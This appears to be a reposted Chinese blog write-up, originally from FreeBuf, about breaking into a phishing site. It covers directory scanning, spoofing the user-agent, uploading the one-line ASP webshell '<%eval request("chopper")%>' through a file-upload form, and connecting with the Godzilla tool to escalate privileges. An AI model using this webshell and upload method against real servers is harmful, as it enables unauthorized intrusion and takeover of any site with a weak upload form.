我们利用scandir 对钓鱼网站进行扫描
发现一个文件上传的入口,我们可以利用他进行上传webshell
二、哥斯拉webshell
绕UA信息
访问这个网站,发现这个小可爱骗骗还搞个个电脑访问
利用谷歌自带的工具 修改UA信息
可以看到这个是非常一个经典的钓鱼网站,一般人们通过填写个人信息,银行卡钱就无了。
三、文件上传webshell
编写一句话asp
一句话asp地址
https://blog.csdn.net/qq_53065516/article/details/115264944?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522167050699716782412517259%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=167050699716782412517259&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-115264944-null-null.142%5Ev68%5Epc_new_rank,201%5Ev4%5Eadd_ask,213%5Ev2%5Et3_esquery_v2&utm_term=aspx%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC&spm=1018.2226.3001.4187
访问我们刚刚发现的 sn.asp ,显而易见这个是一个java写的,我尝试写一个asp马
<%eval request("chopper")%>文件上传
文件上传
重命名文件为 asp 后缀文件,然后,上传。
之后访问IP/xx.asp文件
哥斯拉
利用我们的哥斯拉进行连接
哥斯拉那边运行一下
之后就可以像我这样上线提权了
原创作者:keyoldk
原文链接:https://www.freebuf.com/articles/web/352797.html
如有侵权,请联系删除
推荐阅读
星球部分精华内容推荐
其他更多精彩内容,欢迎加入我们的星球